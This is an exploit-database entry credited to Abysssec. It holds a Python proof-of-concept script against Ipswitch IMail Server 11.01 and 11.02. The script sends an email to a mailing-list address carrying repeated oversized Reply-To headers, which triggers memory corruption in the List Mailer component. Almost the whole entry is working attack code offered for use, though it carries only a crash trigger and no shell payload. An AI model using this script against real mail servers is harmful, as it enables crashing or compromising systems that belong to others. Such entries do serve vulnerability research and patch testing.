Ipswitch Imail Server – List Mailer Reply-To Address Memory Corruption

  • 作者: Abysssec
    日期: 2010-09-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15008/
  • '''
________ __ ____
 |\/|/ __ \ /\| || |_ \ 
 | \/ | || | /\ | || | |_) |
 | |\/| | || |/ /\ \| || |_ < 
 | || | |__| / ____ \ |__| | |_) |
 |_||_|\____/_/\_\____/|____/ 

http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/

'''

'''
Title :Ipswitch Imail Server List Mailer Reply-To Address memory corruption
Version :Imail server v11.01 and 11.02
Analysis:http://www.abysssec.com
Vendor:http://www.ipswitch.com
Impact:Critical
Contact :shahin [at] abysssec.com , info[at] abysssec.com
Twitter :@abysssec

'''

import smtplib

sender = 'from@fromdomain.com'
receivers = ['CrashList@wapteam-f556693']

message = """From: From Person <from@fromdomain.com>
To: To Person <CrashList@wapteam-f556693>
"""
#ReplayCount = 5
#while ReplayCount>0:
# message = message + "Reply-To:"
counter = 3
while counter>0:
# if counter != 50000 :
#message = message + ","
 #message = message + "Reply-To: <someone"+str(counter)+"@example.org>"
 message = message + "Reply-To: "+("A"*200)+"a"*4+"B"*196+"@exam.com"
 counter = counter - 1
 message = message + "\n"
# ReplayCount = ReplayCount - 1
 
#message = message + "\n"
message = message + """
Subject: SMTP e-mail test

This is a test e-mail message.

"""
#print message
#fp = open("C:\\Program Files\\Ipswitch\\IMail\\spool\\tmp188.tmp","w")
#fp.write(message)
#fp.close()
#print "wrote"
try:
 smtpObj = smtplib.SMTP('localhost')
 smtpObj.sendmail(sender, receivers, message) 
 print "Successfully sent email"
except SMTPException:
 print "Error: unable to send email"